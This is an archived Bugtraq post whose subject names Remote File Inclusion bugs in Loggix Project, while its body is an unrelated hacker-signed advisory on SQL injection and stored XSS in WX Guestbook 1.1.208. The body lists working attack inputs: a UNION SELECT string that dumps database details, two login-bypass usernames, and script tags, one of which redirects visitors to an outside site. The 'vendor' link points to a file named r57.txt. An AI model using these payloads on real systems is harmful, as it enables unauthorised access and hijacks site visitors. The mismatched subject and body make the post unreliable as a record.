[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities
From: admin@xxxxxxxxxx
Date: 13 Dec 2009 12:44:46 -0000

###########################################
#       WX Guest Book 1.1.208 Vulns       #
#       By xxHackerXzX hacker from nepal          #
#       admin@xxxxxxxxxxx         #
###########################################

Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt

This product suffers from multiple SQLi and persistent XSS vuln.

##############  SQL Search Vuln  ###############

The search parameters/queries we submit to the search.php are unsanitized and 
hence this can be compromised to SQLinject the server.

SQL query:
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY 
. "%') ORDER BY `code` DESC");

The $QUERY is what we submit through search box so injecting this will sql 
inject the server.
The following is the sample sql injection example.


Sample search string: test%') UNION ALL SELECT 
1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

##############  SQL login bypass  ###############
The username and password fields are unsanitized and hence we can bypass the 
login systems.

Username: admin'))/*
Password: learn3r  [or whatever]

Or

Username: ')) or 1=1/*
Password: learn3r  [or whatever]

##############  Persistent XSS Vulns  ##############

In the name field (I suppose as I don't understand arabic), you can inject 
XSS...
<script>alert(String.fromCharCode(97));</script>
<script>location.replace("http://www.ekin0x.com";)</script>

Prev by Date: Zabbix Server : Multiple remote vulnerabilities
Next by Date: Miniweb 2.0 Full Path Disclosure
Previous by thread: Zabbix Server : Multiple remote vulnerabilities
Next by thread: Miniweb 2.0 Full Path Disclosure
Index(es):
- Date
- Thread